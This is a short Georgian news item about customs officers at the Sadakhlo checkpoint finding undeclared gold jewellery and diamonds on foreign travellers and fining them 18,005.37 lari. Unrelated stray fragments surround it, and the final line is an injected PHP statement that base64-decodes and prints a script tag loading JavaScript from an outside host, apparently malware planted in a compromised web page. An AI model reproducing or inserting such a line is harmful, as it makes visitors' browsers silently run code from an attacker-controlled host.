celsiusi
ავერსი შნაიდერი

 ფინანსთა სამინისტროს შემოსავლების სამსახურის საბაჟო გამშვებ პუნქტში "სადახლო-საავტომობილო“, მებაჟე ოფიცრების მიერ, უცხო ქვეყნის მოქალაქეების, როგორც ფიზიკური, ასევე კუთვნილი ბარგის დათვალიერების შედეგად, არადეკლარირებული ოქროს საიუველირო ნაკეთობები (საერთო წონა - 103,15 გრამი) და 261 ცალი ბრილიანტის თვალი გამოვლინდა.

ინფორმაციას შემოსავლების სამსახური ავრცელებს.

არადეკლარირებული საქონლის საერთო საბაჟო ღირებულებამ 18 005,37 ლარი შეადგინა.

საქართველოს საბაჟო კოდექსის 168-ე მუხლის I ნაწილის შესაბამისად, კანონდამრღვევ მოქალაქეებს, სანქციის სახით ჯარიმა, ჯამში 18 005,37 ლარის ოდენობით შეეფარდათ.

265
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");